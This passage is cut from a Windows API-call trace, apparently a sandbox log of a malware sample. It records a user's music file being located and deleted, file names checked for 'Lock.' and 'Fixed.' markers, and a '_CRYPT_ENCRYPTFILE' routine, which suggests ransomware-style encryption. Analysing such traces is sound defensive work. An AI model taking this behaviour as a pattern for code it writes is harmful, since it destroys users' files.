hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0246.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0246.594] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0246.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0246.594] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0246.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e58910 [0246.595] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a", lpFilePart=0x8cedf4*="psWdx1ftUz7.m4a") returned 0x25 [0246.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0246.595] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a" (normalized: "c:\\users\\fd1hvy\\music\\pswdx1ftuz7.m4a")) returned 0x20 [0246.596] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf78c4360, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0xa8983f30, ftLastAccessTime.dwHighDateTime=0x1d5ef5b, ftLastWriteTime.dwLowDateTime=0xa8983f30, ftLastWriteTime.dwHighDateTime=0x1d5ef5b, nFileSizeHigh=0x0, nFileSizeLow=0xa0af, dwReserved0=0x1, dwReserved1=0x1c, cFileName="psWdx1ftUz7.m4a", cAlternateFileName="PSWDX1~1.M4A")) returned 0xa87410 [0246.596] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a" (normalized: "c:\\users\\fd1hvy\\music\\pswdx1ftuz7.m4a")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0xa87410, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf78c4360, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0xa8983f30, ftLastAccessTime.dwHighDateTime=0x1d5ef5b, ftLastWriteTime.dwLowDateTime=0xa8983f30, ftLastWriteTime.dwHighDateTime=0x1d5ef5b, nFileSizeHigh=0x0, nFileSizeLow=0xa0af, dwReserved0=0x1, dwReserved1=0x1c, cFileName="psWdx1ftUz7.m4a", cAlternateFileName="PSWDX1~1.M4A")) returned 0 [0246.640] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0246.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0246.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0246.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0246.640] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0246.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0246.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0246.641] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e58910 [0246.641] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a", lpFilePart=0x8cf650*="psWdx1ftUz7.m4a") returned 0x25 [0246.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0246.641] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a" (normalized: "c:\\users\\fd1hvy\\music\\pswdx1ftuz7.m4a")) returned 0xffffffff [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0246.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0246.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0246.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDmw5DGaT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dmw5DGaT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mw5DGaT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w5DGaT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5DGaT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DGaT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GaT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aT83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="83 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YD.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0246.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0246.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0246.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0246.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0246.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0246.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0246.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0246.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0246.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0246.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x26) returned 0x977bd8 [0246.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDmw5DGaT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dmw5DGaT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mw5DGaT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w5DGaT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5DGaT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DGaT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GaT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aT83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="83 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0246.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YD.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0246.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0246.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0246.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0246.645] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0246.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0246.645] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0246.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0246.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0246.646] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0246.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0246.646] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e58910 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 